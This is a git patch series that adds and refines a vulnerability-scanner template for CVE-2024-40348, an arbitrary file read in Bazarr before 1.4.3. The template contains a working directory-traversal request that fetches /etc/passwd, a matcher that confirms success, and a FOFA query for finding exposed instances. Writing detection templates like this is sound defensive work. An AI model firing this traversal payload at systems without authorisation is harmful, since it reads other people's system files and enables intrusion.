From 2b4706defeba0e0c1ff9ea782443c028ec91b28e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 18 Jul 2024 21:52:31 +0300 Subject: [PATCH 1/5] bazarr lfi --- .../other/bazarr-arbitrary-file-read.yaml | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml new file mode 100644 index 0000000000..45b31d282d --- /dev/null +++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml @@ -0,0 +1,50 @@ +id: bazarr-arbitrary-file-read + +info: + name: Bazarr < 1.4.3 - Arbitrary File Read + author: securityforeveryone + severity: high + description: | + Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. + reference: + - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md + - https://www.bazarr.media/ + metadata: + vendor: morpheus65535 + product: bazarr + fofa-query: title=="Bazarr" && icon_hash="-1983413099" + tags: bazarr,lfi +flow: http(1) && http(2) + +http: + - raw: + - | + GET /login HTTP/1.1 + + matchers: + - type: word + words: + - 'Bazarr' + internal: true + + - raw: + - | + GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 From 3c9ba8908bcd433c5829f3b15a6da2c8a917da55 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 14:21:48 +0530 Subject: [PATCH 2/5] minor-update --- http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml index 45b31d282d..c4953b556d 100644 --- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml +++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml @@ -7,13 +7,14 @@ info: description: | Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. reference: - - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md + - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://www.bazarr.media/ metadata: vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" tags: bazarr,lfi + flow: http(1) && http(2) http: @@ -23,6 +24,7 @@ http: matchers: - type: word + part: body words: - 'Bazarr' internal: true @@ -32,7 +34,6 @@ http: GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: regex From cd4a8c3479bb7eb9352268cfe022b82c2310276d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 15:02:24 +0530 Subject: [PATCH 3/5] Update and rename bazarr-arbitrary-file-read.yaml to CVE-2024-40348.yaml --- .../2024/CVE-2024-40348.yaml} | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) rename http/{vulnerabilities/other/bazarr-arbitrary-file-read.yaml => cves/2024/CVE-2024-40348.yaml} (88%) diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/cves/2024/CVE-2024-40348.yaml similarity index 88% rename from http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml rename to http/cves/2024/CVE-2024-40348.yaml index c4953b556d..d89e06ac17 100644 --- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -1,4 +1,4 @@ -id: bazarr-arbitrary-file-read +id: CVE-2024-40348 info: name: Bazarr < 1.4.3 - Arbitrary File Read @@ -9,6 +9,10 @@ info: reference: - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://www.bazarr.media/ + - https://github.com/bigb0x/CVE-2024-40348 + classification: + epss-score: 0.00043 + epss-percentile: 0.09329 metadata: vendor: morpheus65535 product: bazarr From a2444caa074f96b24e7ce05d0ecade070a7a781f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 15:04:07 +0530 Subject: [PATCH 4/5] Update CVE-2024-40348.yaml --- http/cves/2024/CVE-2024-40348.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index d89e06ac17..ab6c6d46c8 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -17,7 +17,7 @@ info: vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" - tags: bazarr,lfi + tags: cve,cve2024,bazarr,lfi flow: http(1) && http(2) From 9396a830568f049d18895e0bfe797862287e8efd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:50:21 +0530 Subject: [PATCH 5/5] updated matchers --- http/cves/2024/CVE-2024-40348.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index ab6c6d46c8..9cfe50f590 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -14,6 +14,8 @@ info: epss-score: 0.00043 epss-percentile: 0.09329 metadata: + verified: true + max-request: 2 vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" @@ -22,21 +24,23 @@ info: flow: http(1) && http(2) http: - - raw: - - | - GET /login HTTP/1.1 + - method: GET + path: + - "{{BaseURL}}/login" matchers: - type: word part: body words: - 'Bazarr' + - 'content="Bazarr' + - 'window.Bazarr' + condition: or internal: true - - raw: - - | - GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: